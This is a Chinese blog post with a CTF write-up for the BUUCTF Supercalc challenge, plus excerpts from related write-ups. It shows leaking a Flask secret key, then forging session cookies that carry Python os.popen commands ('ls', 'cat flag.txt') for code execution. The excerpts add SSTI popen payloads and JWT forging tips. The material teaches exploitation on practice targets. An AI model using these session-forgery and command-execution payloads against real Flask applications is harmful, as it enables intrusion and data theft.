BUUCTF--[watevrCTF-2019]Supercalc

最新推荐文章于 2022-09-11 00:45:06 发布
最新推荐文章于 2022-09-11 00:45:06 发布
阅读量295 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/119650736
版权

打开页面后发现其功能是进行计算

 使用jwt解析可以发现我们所提交的内容在session中

 通过1/0进行报错,用#注释来进行绕过,
执行命令可以得到加密session时所需的key

根据上面的测试我们可以知道这里是一个Flask_SSTI,所以使用flask-session-cookie加密脚本
将加密后的session替换掉原来的session即可得到结果

使用ls命令查看当前目录下的所有文件

python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f0907855f7" -t "{'history': [{'code': '__import__(\"os\").popen(\"ls\").read()'}]}"

 获取flag

python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f0907855f7" -t "{'history': [{'code': '__import__(\"os\").popen(\"cat flag.txt\").read()'}]}"

Uzero.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
-------已搬运------BUUCTF:[RootersCTF2019]ImgXweb --- jwt --寻找secret,easy
Zero_Adam的博客
04-22 373
目录:一、自己做:二、不足: 一、自己做: 一个见过很多次的登陆,注册框, 登陆后,抓包能够看到jwt, eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYXNkZiJ9.nqJZ6UZ3eIQ9IbFZajzs0LdGSJJnLAbgpESvVlofrKc 解码后: {"typ":"JWT","alg":"HS256"}{"user":"asdf"}Y醷x=!Yj<쐷FHg,ऄVZ 登陆进来之后,能上传文件,任意文件都能够上传,但是.htac
BUUCTF:[CISCN2019 华东南赛区]Web4 ---- jwt的加密,解密 复习 ---- 一个奇怪的 jwt 的secret方法
Zero_Adam的博客
04-19 852
目录:一、自己做:1.没有思路啦,,2.没有思路啦,,二、学到的&&不足:三、学习WP 一、自己做: **注:**没有思路的地方,就是我看WP的地方。 解解jwt瞅瞅, 有加密的东西,我目前遇到过的jwt解法:弱密钥碰撞,碰撞出密钥来,就可以修改数据了,二:无密钥检测,用python重写一个无验证的jwt,有可能也成功, 再是一个进阶的方法:如果是SA256不对称加密的化,我们没办法破解,但是可以用SH256加密的方法巴拉巴拉给弄出来,没遇到过题,然后懒,,没有细细研究, 我*???,我正
BUUCTF [watevrCTF-2019] Supercalc
Senimo
12-20 804
BUUCTF [watevrCTF-2019] Supercalc 考点: session伪造 通过session拼接语句 {{config}}获取SECRET_KEY的值 启动环境: 是一个类似计算机的功能,又一个输入框,尝试输入1+1: 得到计算结果,开始想到的是SQL注入,简单测试了几个payload,都没太有反应,继续对题目进行信息收集 在HTTP请求中,查看到Cookie信息: 可以获取到session: session=eyJoaXN0b3J5IjpbeyJjb2RlIjoiMSArI
[watevrCTF-2019]Supercalc
snowlyzz的博客
09-02 394
flask_session 伪造
[watevrCTF-2019]Supercalc 1
shinygod的博客
03-02 571
知识点:flask-session伪造*,key值寻找 目录解密:加密伪造:分析解题 解密: exp python3 flask_session.py decode -c '你的session' 加密伪造: python3 flask_session_cookie_manager3.py encode -s "key" -t "{'history':[{'code':'__import__(os).system(\"ls \")'}]}"``` 或者直接用下面的直接构造 from flask.sess
CP-M-for-OS-X:z80仿真器+ CPM-80重新实现,旨在允许在OS X下使用原始CPM软件
02-04
CP-M-for-OS-X:z80仿真器+ CPM-80重新实现,旨在允许在OS X下使用原始CPM软件
[2019watevrCTF]Supercalc wireup
ShenZ的博客
01-19 266
[2019watevrCTF]Supercalc wireup calc!这个界面看着就像ssti <class 'os._wrap_close'>是118个 利用os._wrap_close类中的popen读取目录 ''.__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('ls').read() __import__("os").popen("cat flag.txt").read()
[watevrCTF-2019]Supercalc flask-cookie伪造&SSTI
a3320315的博客
02-12 1948
题目 buu新上的题目,晚上没啥事情就做了一下~~ 打开页面是一个计算器 可以执行一些简单的运算,我们还是老实地按步骤走,先扫下目录,没发现什么东西,然后查看header,源码等,都没有发现思路,然后我们看了一下cookie 这个凭直觉都知道是flask的cooike,然后我们放到脚本里面解一下 这不是我们先前的计算么? 那么思路就很明显了,肯定是伪造cooike,那么我们就不必须拿到key才可...
flask、session、cookie解加密脚本
10-13
flask、session、cookie解加密脚本
bugkuctf jwt
舞动的獾
11-13 1683
bugku jwt 查看页面源码,发现了注释,<!–hint:NNVTU23LGEZDG===–> 很像是base64,但是不是,解密结果为未知字符。又去注了半天,没有跑出密码,后来看了大佬的wp才发现是base32,无语,思维定型了,开始的时候想着试试base32,自己把自己否定了,我tcl了。 注释内容base32解密后是kk:kkk123,猜测是账户和密码,登陆成功 信息上要...
[watevrCTF-2019]Pickle Store pickle序列化漏洞~~
a3320315的博客
02-12 1760
题目介绍 要有1000美元买flag,然后我们查看header,扫目录之类的操作,最后在cookie中发现问题~~ gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGViNjJxBXUu 先试试b...
BUUCTF刷题记录[RootersCTF2019]ImgXweb——JWT验证问题
u013119911的博客
07-02 8261
JWT
BUUCTF---[HFCTF2020]EasyLogin保姆级详解。
最新发布
m0_62107966的博客
09-11 1216
zhehco--BUUCTF---[HFCTF2020]EasyLogin保姆级详解。按照刚刚要修改的三个值修改,由于要修改alg为none,在网页上无法直接获取新的jwt,所以用python脚本生成,在此之前先用pip安装好生成jwt的库:PyJWT库。值得注意的是这里的iat,是要用你自己在burpsuite里拿到的jwt里的iat值。确定username为admin,且jwt为新生成的jwt后,放包,回到浏览器,访问。重点看看这两个函数,一个是生成jwt的,另一个是返回flag的。
BUUCTF—————[watevrCTF 2019]Repyc
yhfgs的博客
12-30 1097
1.是pyc文件用uncompyle6反编译。 2.得到py文件,发现是有一大堆乱码。无从下手。 # uncompyle6 version 3.7.4 # Python bytecode 3.6 (3379) # Decompiled from: Python 3.7.8 (tags/v3.7.8:4b47a5b6ba, Jun 28 2020, 08:53:46) [MSC v.1916 64 bit (AMD64)] # Embedded file name: circ.py # Compi.
[BUUCTF]REVERSE解题记录 [watevrCTF 2019]Repyc
weixin_44192213的博客
03-05 4422
这个题并不难,就是看起来有点麻烦。 根据题目给的提示是py代码,反编译一下 #!/usr/bin/env python # visit https://tool.lu/pyc/ for more information 佤 = 0 侰 = ~佤 * ~佤 俴 = 侰 + 侰 def 䯂(䵦): 굴 = 佤 굿 = 佤 괠 = [ 佤] * 俴 ** (俴 * 俴) 궓 = [ 佤] * 100 괣 = [] while
buuctf-[CISCN2019 华北赛区 Day1 Web2]ikun
qaq517384的博客
10-06 553
[CISCN2019 华北赛区 Day1 Web2]ikun 打开题目是一个kunkun和一句买到lv6的话 先注册一个登录栞栞,没有东西,应该就是要买lv6了 点击下一页url加上了?page=2 一开始循环里是url=url+str(i)然后就一直报500code,给自己一拳 lv6每页都有所以要加.png 结果是page=181 import requests url="http://93b9fe83-ed26-4bbe-b6af-b0fd164e9ab5.node4.buuoj.cn:81/sh
CTF bukgu jwt
a3320315的博客
10-30 647
0x01 解题思路 1、我们先打开网址,查看源码得到hint<!--hint:NNVTU23LGEZDG===-->,这儿直接想到base64解码,但是一直解不出来,后来试了试base32解码,成功!(思维太局限了)。 2、解码成功后得到账号和密码kk:kk123 3、我们登录进去得到提示 diary中提到了vim,我们首先想到的就是源码泄露,于是我们直接用dirsearch脚本扫,...
BUUCTFweb刷题记录
夜幕下的灯火阑珊的博客
04-03 2847
[极客大挑战 2019]BabySQL 本题过滤了or from by where ,用双写绕过即可

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值